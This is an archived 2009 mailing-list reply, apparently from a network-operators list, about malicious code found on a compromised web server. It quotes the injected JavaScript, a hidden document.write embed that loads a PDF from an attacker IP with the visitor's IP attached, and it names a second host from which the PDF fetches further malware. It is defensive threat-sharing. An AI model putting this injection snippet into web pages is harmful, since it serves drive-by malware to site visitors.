[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Malicious code just found on web server
- Subject: Malicious code just found on web server
- From: fergdawgster at gmail.com (Paul Ferguson)
- Date: Fri, 17 Apr 2009 18:06:57 -0700
- In-reply-to: <[email protected]>
- References: <B4C14CA371FEA842A548BAAB8E49CA6201758B5C16BF@badlands.win.internal> <[email protected]> <[email protected]>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills <securinate at gmail.com> wrote:
>> I took a quick look at the code... formatted it in a pastebin here:
>> http://pastebin.com/m7b50be54
>>
>> That javascript writes this to the page (URL obscured):
>> document.write("<embed
>> src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|
>> U nknown|US|1.2.3.4\" width=\"0\" height=\"0\"
>> type=\"application/pdf\"></embed>");
>>
>> The 1.2.3.4 in the URL is my public IP address (I changed that).
>>
>> Below the javascript, it grabs a PDF:
>> <embed src="include/two.pdf" width="1" height="0"
>> style="border:none"></embed>
>>
>> That PDF is on the site, I haven't looked at it yet though.
>>
Not only is that .pdf malicious, when "executed" it also fetches additional
malware from:
hxxp:// test1.ru /1.1.1/load.php
If that host is not in your block list, it should be -- known purveyor of
crimeware.
This is in addition to the other malicious URLs mentioned in this thread.
- - ferg
-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.5.3 (Build 5003)
wj8DBQFJ6Seaq1pz9mNUZTMRAsePAJ4ltJybvyViJoiTJDbIN9JCMjbZtgCgtOnI
mxM8Ci/feKnJe6M6qbiESPw=
=b0Yj
-----END PGP SIGNATURE-----
--
"Fergie", a.k.a. Paul Ferguson
Engineering Architecture for the Internet
fergdawgster(at)gmail.com
ferg's tech blog: http://fergdawg.blogspot.com/